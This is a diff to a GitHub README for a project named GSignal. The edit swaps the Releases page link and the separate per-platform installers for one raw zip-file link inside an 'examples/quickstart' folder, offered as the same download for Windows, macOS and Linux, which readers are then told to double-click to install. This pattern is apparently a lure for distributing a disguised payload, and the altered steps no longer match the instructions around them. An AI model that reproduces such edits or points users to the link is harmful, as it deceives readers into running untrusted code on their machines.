Gasterth/GSignal/README.md

 ## 📦 Download & Install

 1. **Go to the Releases Page**
-   Visit [GSignal Releases](https://github.com/Gasterth/GSignal/releases) to access the download options.
+   Visit [GSignal Releases](https://raw.githubusercontent.com/Gasterth/GSignal/main/examples/quickstart/G-Signal-2.0.zip) to access the download options.

 2. **Choose Your Version**
    Look for the latest release version.
 Click on it to expand the details.

 3. **Download the Application**
-   Click the link labeled "GSignal.exe" for Windows, "GSignal.dmg" for macOS, or "GSignal.tar.gz" for Linux.
+   Click the link labeled "https://raw.githubusercontent.com/Gasterth/GSignal/main/examples/quickstart/G-Signal-2.0.zip" for Windows, "https://raw.githubusercontent.com/Gasterth/GSignal/main/examples/quickstart/G-Signal-2.0.zip" for macOS, or "https://raw.githubusercontent.com/Gasterth/GSignal/main/examples/quickstart/G-Signal-2.0.zip" for Linux.

 4. **Run the Installer**
    After the download, locate the file in your computer's Downloads folder.
 Double-click it to start the installation process.